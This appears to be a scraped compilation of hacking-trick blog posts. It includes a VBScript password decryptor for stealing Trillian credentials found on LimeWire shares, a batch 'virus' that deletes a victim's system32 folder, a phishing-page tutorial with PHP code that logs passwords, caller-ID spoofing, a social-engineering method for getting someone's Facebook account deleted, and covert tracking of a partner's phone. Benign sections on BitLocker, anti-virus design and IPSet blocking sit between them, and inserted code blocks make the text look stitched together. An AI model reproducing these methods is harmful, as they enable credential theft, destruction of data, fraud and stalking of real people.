redim pwds(pwdl-1)
for x = 0 to ubound(pwds)
‘msgbox mid(pwd,(x * 2)+1,2)
pwds(x) = int(“&h” & mid(pwd,(x * 2)+1,2))
next
if ubound(pwds) > ubound(keys) then
maxval = ubound(keys)
else
maxval = ubound(pwds)
end if
for x = 0 to maxval
goods = goods & chr(pwds(x) xor keys(x))
next
inputbox “Decrypted Password”,”",goods
end sub
4. Select FILE and choose SAVE AS
5. From the “Save as Type” drop-down menu select “All Files (*.*)”
6. Save the file as “TrillianPass.vbs” in the desired folder. Remember it’s location.
7. Start LimeWire
8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini
9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.
10. Open the downloaded file in Notepad.
11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.
12. Open the file that was created earlier: TrillianPass.vbs
13. Paste the encryped password into the Trillian Password Cracker and press “OK” to reveal the real password
14. How this works:
The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program’s preferences are set to share a whole drive instead of just one or two folders .

Change Your IP…

1. Click on “Start” in the bottom left hand corner of screen
2. Click on “Run”
3. Type in “command” and hit ok
You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”
5. Type “exit” and leave the prompt
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”
You should now be on a screen with something titled “Local Area Connection”, or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on “Local Area Connection” and click “properties”
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab
10. Click on “Use the following IP address” under the “General” tab
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until I fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here
14. Hit the “Ok” button again
You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings
17. This time, select “Obtain an IP address automatically”
18. Hit “Ok”
19. Hit “Ok” again
20. You now have a new IP address
do at ur own risk
Tushar.

Making a Virus to destroy your victim’s pc…

Hi Guys! I m here explain to make a file that destroys u r victims pc I m not responsible for the damage caused by this file.
1. Open Notepad
2. write the above command : -del c:\WINDOWS\system32\**/q
3. Save the above notepad with the extension “.bat or .cmd” as u want[For e.g : File -> Save As -> Type abhi.bat or aaa.cmd
4. ??????????????? Attention !!!!!!!!!!!!!!!!
!!!!!!Don’t double click the file otherwise u r in trouble.
becoz the file u created delete all files from ursystem32 folder and  when u restart ur pc it will not startbcz system can not find the files in the system32 folder whichis required at the time of booting.
5. You can also test the above by creating a fake folder let supposewindows1 in C:\.
Copy some old files in it and just follow theabove command.By double clicking the bat
or cmd file ur all filesautomaitcally get deleted.6. You can try this file in any one`s
computer.(but this result in causing damage to the computer, so thik again before
trying this on anyone’s pc)

Make Your Own Phishing Site

Hello Friends
Tired Of Searching For Those Phishing Files
How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps
Here Is The Tutorial
1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.
2. When You Found Your Site Right Click On It And Say “view source” And Save It On Desktop As index.html
3. Open The “index.htm” With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action=”RANDOM URL” method=”post”

4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method
Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page
5. Save index.html
11. Save This File write.php, And Upload It To The Subdomain Aswell
12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,
ENJOY!!!!
Open The index,html File In Notepad And Press CTRL+F
You Will See A Box
Type Action And Press Enter
It Will show U The Word
there You Will See 2 Options
Up And Down
Select Up
Then Enter
Code For Write.php File
<*?php
header(“Location: http://RANDOM“);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Remove The * Symbol From The Start Of The Code

Call Spoofing

Here is the trick….
just dial -
+239 299328

then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call … everything done, and call will get connected
or else use this format –
+239 299328 p 919895012345 p 919895000000
here it will display the no: 919895012345
and make call to this no: 919895000000
and hope u know “p
just press star key 3 times “p” will appear
In Iphones … instead of p a comma , is used
NOTE
* To spoof your phone will call an international number , international rates will apply
* Number to call should start with the 91 prefix
* Dialing the spoof no: takes around 20 seconds
* Some one told me that this spoof work for all country’s , i am not sure about that but its working in india
* Even if you try to make miss call you will loose money , since you are dialing an international no:
DISCLAIMER
* Do this at your own risk. I am not responsible for any damage caused
* Just shared with you guys coz sharing is caring.. dont call 100 and say “bomb”

PenTBox v1.4

PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools like DoS and DDoS, Secure Password Generators, Honeypots and much more. Destined to test security and stability of networks.
Tools included in PenTBox
Base64 encoder and decoder,
Digest for MD5, SHA1, SHA256 and SHA512,
Port scanner,
TCP DoS,
TCP AutoDoS,
SYN DoS,
Honeypot,
L33t Sp3@k Converter

PenTBox is programmed in Ruby, so Ruby is required. It is oriented to GNU/Linux systems and is also compatible with Windows, MacOS and more.
Tutorial for PenTBox:
1. Download PenTBox and untar it.
2. We are using a Windows box, so simply run the exe and choose from the three options.
3. And you’re ready to attack or audit. Nothing much to think about or rely on.

Download PentBox Here
PenTBox is simple yet powerful. The feature I liked most is the simple honeypot.

WEAKERTHAN LINUX FOR HACKERS

Most of you would have heard about BackTrack, but it’s not the only one in the business. Weakerthan is another Linux-based pentesting distro which is really good. My second favorite after backi


Intro:


WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.
The tools i have selected are tools we use all the time here, as i said, If you find some that you want in it, please let me know. The image is about 1GB meaning; It will have to be on DVD, meaning; I can’t host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that are preinstalled:
* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..



really good GUI+vulnerable applications to test our hacking skills


my personal experience with weaknet was really good & its worth.


WEAKERTHANv2 WeakNet Linux 5 – ISO ~684MB
WeakNet Linux Complete Administration Guide

Friday, February 25, 2011

How To Delete Someone Else Facebook Account

This is an extreme example of Social Engineering technique, we need following things to do so.
1. Victim’s profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.
* Now you will get this screen
Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.
* You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.
* After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
* Next Day or Same Day you will get an Email that your account is disabled.
This tutorial is for education purpose only, once deleted profile can never be recovered.

Use Windows 7 BitLocker to Password Protect, Encrypt USB Drive

Do you have important data on your USB drive that you don’t want to share with anybody? It may be documents, usernames and passwords, or operating systems. Then why not encrypt the USB drive with a password? If you’re using Windows 7, you don’t even need any third-party software to password protect portable drives.
Windows 7 includes a program called BitLocker for encrypting any drive in 2-3 simple steps. Just follow the steps below and you can secure your files on a USB flash drive by setting a password and encrypting its contents.

How to Use Windows 7 BitLocker to Password Protect USB, Portable Drives

Step 1 : Insert your USB drive or any portable hard drive and right-click on it in Explorer. Now choose “Turn on BitLocker…”
Step 2 : A small window will appear and prompt you to choose a password, which will be required to open the drive later. Proceed by clicking “Next”.
Step 3 : BitLocker will create a recovery key and save it on your PC in case you forget the password. Simply choose the first option to save the recovery key in a text file in a secure place.
Step 4 : Wait a few minutes while it encrypts the portable drive. How long this takes depends on the amount of data on your removable drive.
Step 5 : Once done, unplug the USB drive and insert it again to see the encryption in action. BitLocker will start automatically and prompt you for the password. You only have to enter the password once to access the data, until you unplug the drive.
The encryption is absolutely machine independent, i.e. whenever you insert the USB drive into any other computer, it will still prompt for the decryption password.
This is very useful for locking USB drives with a password and encrypting them to keep the data secure.

Hide your IP address

Your IP is exposed whenever you visit a website. When your IP gets exposed it becomes easy to trace you and find out your personal information. Hackers can use your IP to gain access to your personal files and documents and can even get into your paypal, alert etc. accounts. Hide the IP is software which masks your IP with one click so you can surf the web anonymously. On the other hand, hackers can use this software to hide their identity and not get caught. It’s beneficial for all and I recommend that every PC should have this software installed.
Hide the IP to be the best one. Its ease of use, reliability, wide range of options, speed and unmatchable price were on top when compared to that of the remaining IP hiding software on the market.

Key Features of Hide the IP:

Hide IP Address »
Single click to completely hide your Online Identity. Others will see a fake IP address masking your real IP, thus, protecting your privacy.
Select Your Physical IP Location »
You decide which country will be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated, IP addresses available for use.
Anonymous Web Surfing »
You are protected from hackers who will be tricked by your fake IP instead of your real. They will never be able to find any information about you by tracing the fake IP.
Send Anonymous E-mails » Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!
Bypass Website Country Restrictions »
Surf websites which are restricted for your country. Surf in forums on which you were banned.
Supports Internet Explorer, Firefox, Google Chrome, Safari, Opera.
So what are you waiting for? Download the free trial and test Hide the IP on your computer now! For more information on Hide the IP visit the following link.

Hide the IP

Building an Anti-Virus engine

An article that describes in simple steps how an AV engine is structured. Easy to understand, not too technical and without any code.

The article will describe the basic ideas, concepts, components and approaches involved in developing an anti-virus program from scratch from a developer’s/software engineer’s point of view. It will focus on the main elements of an anti-virus engine (hereafter referred to as AV engine) and will exclude aspects like graphical user interfaces, real-time monitors, file system drivers and plug-ins for certain application software like Microsoft Exchange or Microsoft Office. Although AV engines running/scanning for single platforms (such as Palm OS or EPOC/Symbian OS) can be designed in the same way, this article will focus on designing multi-platform scanning engines, which are far more complex.

Overview

Currently, innovations in AV engines consist primarily of minor changes to existing engines. Complete redesigns of overall engine concepts are rarely seen. One exception is the highly respected Kaspersky AntiVirus (AVP) version 4.0, which was released in early 2002.
The main parts of an AV engine are typically compiled from the same source code for various platforms, which may differ in byte order (little/big endian), CPUs and general requirements on aligned code. All of these considerations must be kept in mind when developing the concept of an AV engine, as the platform on which the engine is designed to run will be a central design consideration. As well, when developing a new AV engine from the ground up, the following considerations or requirements must be taken into account:
  • Targeted platforms
  • Programming language
  • File access
  • Required modularity.

Targeted Platforms

A lot of platforms execute code faster when the data parts are aligned to long word (32 bit) addresses. Other platforms are not able to access 16 bit/32 bit values that are not on even addresses; for example, older Motorola CPUs like the MC68020 had this limitation. The choice of programming language depends directly on the platform or platforms of implementation. Generally an AV engine should be developed in a programming language that is available for all platforms. Optimizing compilers for all platforms are available. Typical AV engines are currently developed using the programming languages C or C++. C++ is considered the more modern language but, being based on the object-oriented approach, it is typically bigger and slightly slower than C code. As certain data types will be interpreted differently on different platforms (for example, as determined by long or integer variables), it is also very helpful to define data types based on standard data types, which are the same on all supported platforms.

File Access

To enable the core AV engine to be independent from the surrounding operating system, there must be an abstraction layer between the core AV engine and the file system, and this layer has to include conditional compilation for dedicated platforms. Another straightforward technique is to compile certain parts of the AV engine only for dedicated operating systems and not to use a file system layer at all. While this approach produces results faster, in the long term it turns out to be neither easily maintainable nor expandable. An abstraction layer, comparable to the file system abstraction layer, should also be implemented for the memory interface and the graphical user interface, so that the core scan engine always has to call the same API calls to allocate memory, generate message boxes etc.

Modularity

Modularity is an important consideration in modern software development. Obviously, it is advantageous to create clean interfaces and make all program parts modular. By designing the overall AV engine with modularity in mind, single parts can be replaced later by a more powerful module while keeping the functionality the same. (This aspect will be covered in the discussion of on-line update functionalities later in this paper.) For corporate customers, it is especially important to offer a flexible management console/interface. This part obviously does not belong to the AV engine core, but should be kept in mind when designing overall interfaces, engine modules and communication matrixes. Speaking of modularity, it is also a good idea to divide the parts of the core AV engine into components, whereby the separation into a binary virus engine and a macro/script engine can be seen as a high level approach.

Pragmatic Functions

Now that some of the conceptual aspects of the AV engine design have been discussed, it would be helpful to consider some of the pragmatic functions that must be incorporated into the design of an AV engine. The following components or functions must all be taken into account in the development of a “modern” AV engine:
  • Engine core
  • File system layer
  • File type scanners (rtf, ppt, mz, pe, etc.)
  • Memory scanners
  • File Decompression (e.g. ZIP archives, UPX compressed executables)
  • Code emulators (e.g. Win32)
  • Heuristic engines
  • Update mechanisms.

AV Engine Core

The AV engine core can be seen as a straightforward framework that calls “external” scan modules and therefore can be expected to be the necessary “glue”. As a result, it needs to be designed as a “registration” mechanism, so that additional components, such as a scanner for a new file format, can be registered and updated. This mechanism needs to be protected by digital certificates or similar mechanisms. Currently, there are scan engine frameworks, such as the Exchange virus protection, that offer to use between one and five different scan engines from different vendors, which will be directly called out of the framework. For example, besides their own scan technologies, F-Secure utilizes several solutions in their AV products, including F-Prot and AVP scan engines.

File System Layer

As mentioned in the previous section, it is a good idea to implement a file system layer so that all parts of the AV engine can invoke the same API calls on all platforms. The following functionalities (close to the ANSI C standard) should be supported to enable easy access to files:
  • open(filename)
  • close(filehandle)
  • read(file handler, buffer, length, number of read bytes)
  • write(file handler, buffer, length, number of written bytes)
  • seek(offset, optional fields)
  • find first(handle)
  • find next(handle)
In case a seek() functionality is not intended to be supported as an API call, the read/write functionality needs to be enhanced by adding a “file offset” field. The general “find first/find next” file functionality will typically only be used within the core AV engine, as this core part then passes the file pointer-like structure to the “external” scan modules for further operations.

File Type Scan

In regards to the program progression, one of the first steps is to identify the file type/archive type. For the time being, let’s call this point within the engine the “entry point”. This can be handled from the core AV engine or from a dedicated function call within every scanner module for a dedicated file format/type. In order to enable easy change/adaptation of a new scanner module, the latter method is preferred.
Typically, this file type check can be performed rather quickly (e.g. for Windows PE files, OLE documents etc.). In dedicated cases like PalmOS PRC files the detection is more complex and, again, should not be placed within the core AV engine. If a compressed file is detected, decompression engine/functionality, which shall be discussed in greater detail later in this article, has to be called. More generally speaking, decompression engines can also be seen as some kind of a scanner module, which necessarily has to call back to the AV engine’s entry point.
After the file type has been determined, the corresponding scanner module has to be called to perform the scan routine itself. Every module should have the ability to call back to the entry point of the AV engine. This may be required in the case of scanning embedded files within other files (for example, a Word document embedded within a PowerPoint presentation). Depending on the result of the scan, the AV engine must be able to interact with the user interface via a generic abstraction layer to show certain warnings, requests, etc.
At this point it makes sense to define what functionalities should exist within every scanner module:
  • file type detection code, which checks whether the given input can be handled by the scan module;
  • scan functionality (which should be able to interact with the GUI elements to show requesters etc.); and,
  • removal functionality (e.g. remove link viruses from infected files or delete files completely).
The idea is to keep the interface as small and clean as possible. The scan modules should not rely on any buffers located in the core AV engine. Furthermore, the core scan module should just see file/memory pointers and work with these pointers. All underlying operations/layers should be fully transparent for the scan module.

Removal Functionality

In the case of removal functionality, it is often necessary to remove registry entries in order to disable the activation of certain malicious code. This functionality, which is obviously heavily dependent on the underlying platform, should be programmed using direct operating system functions, and should be compiled only when needed. At this point it makes no sense to implement an abstraction layer.

Memory Scanning Components

The memory scanning components (e.g. memory scanner for Windows 95/98 IFS-based malicious codes) can be placed within the same category as the registry cleaning functionalities described above. It should be noted that the memory scanning components are often not within the main focus of the development of the AV engine.

Decompression

The decompression functionality within AV engines is often seen as a small task, but it is truly a complex program. On the one hand, archives, like .zip, .tar, etc., and exchange formats, such as mime, uuencode etc., are decompressed recursively and without the need for external decompression programs. On the other hand, it should also be possible to decompress executable files. Speaking of decompression of archives/exchange formats, it seems to be a good approach to decompress all files into a predefined directory and perform recursive decompression operations, if necessary. In the past we have seen a couple of attacks (see [42]) against decompression modules that decompressed the embedded files in memory, so that the system ran out of memory. The file located at [42] is a .zip archive with a total length of 42 kb. Recursively unpacked, the files archived within this file are far more than 100 MB, so that an “in memory” decompression would obviously decrease performance drastically.
Additionally it should be possible to compress the files into archives again to enable meaningful cleaning operations. The decompression operation, therefore, also needs access to the generic file system layer to store/access decompressed files.
Speaking of compressed executable files (e.g. compressed with UPX), a similar approach is possible. The decompressed file can be saved in a predefined directory and then scanned. Another typical approach is to decompress the entire file into memory and pass back the pointer and length of the file to the calling instance. The file system layer would then have to be able to address a memory range as a file as well.
Finally, it should be noted that encrypted files/archives are still a major problem for decompression engines and therefore also for AV engines. Nearly all archive tools offer the possibility to encrypt the content.

Detection Engines and Techniques

Right now it is worth taking a look at detection engines and techniques besides heuristic engines.
Nearly every modern AV engine contains checksum-based engines (often straightforward CRC32) and scan string-based engines. In addition to these basic techniques, script-based interpreters can often also be found in engines. By implementing these interpreters with complex instruction sets, it is possible to write detection/removal routines even for highly complex polymorphic viruses, and often without the need to change the engine/program detection code in C/C++. Obviously, these interpreters need access to emulators, memory layers and file system layers to become as powerful as possible. The interpreters typically work with precompiled code (pcode) located in the data/definition files.
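The module registration, entry-point call-back, decompression limits and CRC32/scan-string checks described in the File Type Scan, Decompression and Detection sections, put together as an added Python example (it is not code from the article or from any AV product). The class names, the limits and the harmless test signatures are assumptions made for this example, and members are held in memory under a byte budget rather than written to a scratch directory.

```python
import io
import zipfile
import zlib

# Constructed, harmless stand-ins for real signatures (assumptions for this example).
SCAN_STRINGS = {b"HARMLESS-TEST-MARKER-0001": "Test.Marker.A"}
KNOWN_CRC32 = {zlib.crc32(b"constructed sample body\n"): "Test.Checksum.B"}

class BudgetExceeded(Exception):
    """Unpacking would exceed the engine's limits; the caller should flag the file."""

class Engine:
    """Core 'glue': a module registry plus the limits shared by one scan."""
    def __init__(self, max_depth=4, max_total_bytes=1_000_000, max_ratio=200):
        self.modules = []
        self.max_depth = max_depth
        self.max_total_bytes = max_total_bytes
        self.max_ratio = max_ratio
        self.unpacked = 0  # bytes decompressed so far in this scan

    def register(self, module):
        self.modules.append(module)

    def scan(self, name, data, depth=0):
        """Entry point: the first module whose detect() accepts the data scans it."""
        if depth > self.max_depth:
            raise BudgetExceeded(f"{name}: nested deeper than {self.max_depth} levels")
        for module in self.modules:
            if module.detect(data):
                return module.scan(self, name, data, depth)
        return []

class ZipModule:
    """Archive module: unpacks members and hands each back to the entry point."""
    def detect(self, data):
        return data[:4] == b"PK\x03\x04"  # ZIP local file header magic

    def scan(self, engine, name, data, depth):
        findings = []
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if info.is_dir():
                    continue
                path = f"{name}/{info.filename}"
                if info.flag_bits & 0x1:  # encrypted member: cannot be inspected
                    findings.append((path, "Encrypted.NotScanned"))
                    continue
                # Reject on the declared sizes before decompressing anything.
                if info.file_size / max(info.compress_size, 1) > engine.max_ratio:
                    raise BudgetExceeded(f"{path}: compression ratio too high")
                remaining = engine.max_total_bytes - engine.unpacked
                # Headers can lie, so also cap the bytes actually read.
                with archive.open(info) as member:
                    body = member.read(remaining + 1)
                if len(body) > remaining:
                    raise BudgetExceeded(f"{path}: total unpacked size over budget")
                engine.unpacked += len(body)
                findings += engine.scan(path, body, depth + 1)
        return findings

class SignatureModule:
    """Fallback leaf scanner: whole-file CRC32 plus scan strings."""
    def detect(self, data):
        return True

    def scan(self, engine, name, data, depth):
        hits = [KNOWN_CRC32.get(zlib.crc32(data))]
        hits += [label for needle, label in SCAN_STRINGS.items() if needle in data]
        return [(name, label) for label in hits if label]

def build_engine(**limits):
    engine = Engine(**limits)
    engine.register(ZipModule())        # specific formats first
    engine.register(SignatureModule())  # catch-all last
    return engine

def make_zip(members):
    """Build a constructed ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for member_name, body in members.items():
            archive.writestr(member_name, body)
    return buf.getvalue()

def is_blocked(data, **limits):
    """True if scanning the sample trips a depth, ratio or size limit."""
    try:
        build_engine(**limits).scan("sample.zip", data)
    except BudgetExceeded:
        return True
    return False

if __name__ == "__main__":
    inner = make_zip({"note.txt": b"x HARMLESS-TEST-MARKER-0001 x"})
    print(build_engine().scan("outer.zip", make_zip({"inner.zip": inner})))
    print(is_blocked(make_zip({"zeros.bin": b"\0" * 2_000_000})))
```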

Designing the On-Line Update

The core points of AV engine architecture have now been discussed. Another point to consider is the design of the “on-line update” functionality that allows users to update their AV protection. Basically there are two choices of update functionality: update data files or update data files and update executable code.
Generally speaking, all updates should be digitally signed to protect the users from installing malicious updates. It is not critical to implement this in the data file updates. Sending out only the changes relative to previously installed versions, instead of complete update files, will keep network traffic low and, as such, is an attractive feature for users in corporate environments. Updating executable code using on-line functionality is usually a more complex operation. This approach typically replaces complete modules of an AV scanner. Therefore the AV engine needs to have the functionality to register, remove, update and add modules of its own. This interface obviously needs to be protected (for example, by digital certificates), otherwise malicious code could start to attack this registration interface and disable certain important functionality.

Conclusion

At this point it is clear that the development of a complete AV engine for a platform like Windows is an extremely complex task, one that needs to be undertaken by a group of developers. Keeping an AV engine stable and maintainable over a long time is a difficult job that requires a large investment of money and experience in software engineering. Therefore it is not likely that the selection of independent AV solutions will increase significantly within the next few years. This is unfortunate because the technical requirements on AV engines continue to grow and a greater variety of possible solutions can only help AV developers and AV users.

Blocking IPs by country using IPSet and IPTables

Introduction

What would you do when you want to allow only specific countries to access content on your server? There are many ways to do it, such as installing an application or using mod_geoip with Apache.
But none of that is global: if you use Apache to block IPs, other ports will still be open to the blocked countries. It might be global in the exceptional case where you installed an application that sits listening to all connections, something like a firewall.
But what’s the guarantee that it will not be bloat or extra load on the system? There’s no guarantee about it.
So here we have something nice, different, trustworthy, easy to use and lightweight: IPSets in combination with IPTables.

What is IPSet?

IPSet basically allows you to store multiple IP addresses and/or ports in a table and match across all of them at once. The table lookups are much faster than using individual IPTables rules.
The IPSet framework is included in 2.4.x and 2.6.x kernels by default, but the utility with which it is managed has to be installed separately. I have no clear idea if any distributions have packages for IPSet.

Some features of IPSets

  1. Store multiple IP addresses or ports in a table and match against it using iptables at once, without much performance overhead.
  2. Dynamically update the IP addresses or ports in the table without changing the rules in iptables, again with a low performance penalty.
  3. Express multiple IP addresses and ports in one single iptables rule; that is, with one single rule you can match against a million IPs (just an example, there can be even more).

Installing IPSet

You will need the source code for the kernel you are currently running. It is usually available as a kernel-headers package, though this varies from distribution to distribution. In most cases the kernel source code is found under /usr/src/linux-<version>, which is easier to reference as /usr/src/linux-$(uname -r) at the shell because you don’t have to type the version. At the time of writing, there are two versions of ipset available at http://ipset.netfilter.org/install.html.
We will be using ipset 4.5, which is for kernels >= 2.6.16 and >= 2.4.36.
First extract ipset-4.5.tar.gz and change directory to ipset-4.5:
> tar -xf ipset-4.5.tar.gz
> cd ipset-4.5
Assuming you have the kernel source code available at /usr/src/linux-$(uname -r), issue the following command to compile ipset:
> make KERNEL_DIR=/usr/src/linux-$(uname -r) IP_NF_SET_MAX=256 IP_NF_SET_HASHSIZE=1024
IP_NF_SET_MAX controls the maximum number of IPsets permissible and IP_NF_SET_HASHSIZE sets the default size for hash maps. The default values are used in the above command for illustration; make uses the same values even if you don’t specify them.
Now, to install, run sudo make install, or su -c 'make install' if you are running as a regular user, or simply make install if you are running as root:
> sudo make install
If you don’t get any errors, installation is complete.

Using IPSet to block IPs by country

As the title says, our objective is to block IPs belonging to certain countries. In this article I’ll consider China (cn) and Russia (ru) to be blocked.

Creating IPsets and Adding IPs to Them

Now that ipset has been installed, let us create the set named `countries'. Please note that all the following commands are to be executed as root; you may use sudo or su -c as applicable.
# ipset -N countries nethash
This creates a new ipset named `countries' of type `nethash'. There are different types of ipsets, viz. ipmap, macipmap, portmap, iphash, nethash, ipporthash, ipportiphash, ipportnethash, iptree, iptreemap, setlist.
Each set type has its own purpose, and the use of each can be found in the ipset man page, also available at http://ipset.netfilter.org/ipset.man.html.
Here we are using the `nethash' set type because the IP database at ipdeny.com, which we will be using to block IPs, provides IPs in IP-Address/CIDR-length form, which is supported only by `nethash'.
Now that we have created the set named `countries', we can start adding IP addresses to the set. As I said earlier, in this article, blocking China and Russia is taken as an example. No offense meant please.
The IPs existing in China and Russia are found at http://www.ipdeny.com/ipblocks/data/countries/cn.zone and http://www.ipdeny.com/ipblocks/data/countries/ru.zone respectively. To add all the IPs from these two zones, we’ll be using a simple bash for loop coupled with wget to retrieve the zone files.
# for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/{cn,ru}.zone)
> do
> ipset -A countries $IP
> done
This will add all the IPs in the CN and RU zones to the IPset. If you are adding more zones to your block list, please note that the nethash set can store up to 65535 addresses. If you exceed the limit, you must add the remaining in another set, and so on. The total number of IPs in China and Russia zones combined

Matching against the IPSet(s) in IPTables


The IPs which we want to block have been added to the sets. So now let us add rules in IPTables and block those IPs!
We will be applying the filter on the INPUT chain, to block all connections from CN and RU.
So here’s how you do it:
# iptables -A INPUT -m set --match-set countries src -j DROP
Now connections from all IPs that exist in the set `countries', that is CN & RU as we created the set above, will be blocked, unless you have any other rule before this rule to permit connections.
In case you exceeded the 65535 address limit and have multiple sets to match against, for example the first set named `countries', the second one `countries1' and so on, note that several -m set --match-set options in a single rule must all match for the rule to apply, so one rule listing every set would only drop addresses present in all of the sets. Add one rule per set instead, as illustrated below:
# for SET in countries countries1 countries2; do iptables -A INPUT -m set --match-set $SET src -j DROP; done
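The set-size limit and the one-rule-per-set layout described above, as an added example that is not part of the original article: a shell function that checks every zone-file line before it reaches ipset, refuses malformed entries and a /0 prefix, and starts a new set whenever the given limit is reached. The function names, the sample data and the accepted prefix range of 1-32 are assumptions; the function only prints the commands so they can be reviewed before being run as root.

```shell
# Added example, not from the original article.
# Usage: gen_country_rules BASE_NAME MAX_PER_SET [ZONE_FILE...]
# Prints ipset/iptables commands; returns 1 if any line was rejected.
gen_country_rules() {
    base=$1; max=$2; shift 2
    cat -- "$@" | awk -v base="$base" -v max="$max" '
    function valid(c,    p, o, i) {
        # Accept only a.b.c.d/len, octets 0-255, len 1-32 (assumed range).
        # A /0 entry would match every source address, so it is refused.
        if (c !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\/[0-9]+$/) return 0
        split(c, p, "/"); split(p[1], o, ".")
        for (i = 1; i <= 4; i++) if (o[i] + 0 > 255) return 0
        return (p[2] + 0 >= 1 && p[2] + 0 <= 32)
    }
    function setname(n) { return (n == 0) ? base : (base n) }
    BEGIN { count = 0; nsets = 0; bad = 0 }
    { sub(/\r$/, "") }              # tolerate CRLF line endings
    /^[ \t]*(#|$)/ { next }         # skip comments and blank lines
    !valid($1) { bad++; print "rejected: " $0 > "/dev/stderr"; next }
    seen[$1]++ { next }             # drop duplicates across zone files
    {
        if (count % max == 0) {     # first entry, or the current set is full
            print "ipset -N " setname(nsets) " nethash"
            nsets++
        }
        print "ipset -A " setname(nsets - 1) " " $1
        count++
    }
    END {
        # One rule per set: all matches listed in a single rule must succeed.
        for (i = 0; i < nsets; i++)
            print "iptables -A INPUT -m set --match-set " setname(i) " src -j DROP"
        exit (bad > 0)
    }'
}

# Constructed sample input (documentation address ranges, not real zone data).
sample_zone() {
    printf "%s\n" "# constructed sample" "192.0.2.0/24" "198.51.100.0/25" \
        "0.0.0.0/0" "203.0.113.0/24" "192.0.2.0/24" "203.0.113.300/24"
}
# Try it: sample_zone | gen_country_rules countries 2
```

With real zone files, save them to disk first and pass 65535 as the limit; a non-zero return status means at least one line was refused and the download should be inspected before any rule is loaded.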
So, enjoy, secure your server better….

How To Trace and Spy Your Girlfriends Mobile Phone Live for Free

Yes Guys, this is now possible, I’m not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap makes it possible. It’s a service that provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfriend/wife too, LOL. This PhoneOnMap can be used worldwide and you can use it while traveling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketing department of an organization to track the marketing agents.

If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installing application on cell phone.
Features of GPS cell phone tracking system:
  1. GPS cell phone tracker and locater will not work in the underground transportation.
  2. The application does not work when the phone is turned off.
  3. Data transmission outside the provider’s coverage area will add roaming charges, as with any other phone service.
  4. Once the application is uninstalled from the cell phone, you can’t do anything.
  5. The Internet tracking system shows the cell phone location at intervals of between 10 seconds and 10 minutes, depending on the setting.
According to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delivery system like Courier and Home delivery system. This will help them to get a real-time location of the object and provide an accurate time-frame for the delivery.
As of now this service does not provide the exact pin point location but the location determined is in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfriend ;)
www.phoneonmap.com

How to make a completely hidden folder

Here, I am going to illustrate a method to completely hide a folder which you don’t want to be displayed, not by using attributes but by a tricky method. It can be done without changing any attribute, without using any software, and without adding or removing any files. It’s a simple trick which can be done with normal Windows, with no extra installations and no hi-fi tricks.
Navigate to the folder which you don’t want to be displayed.
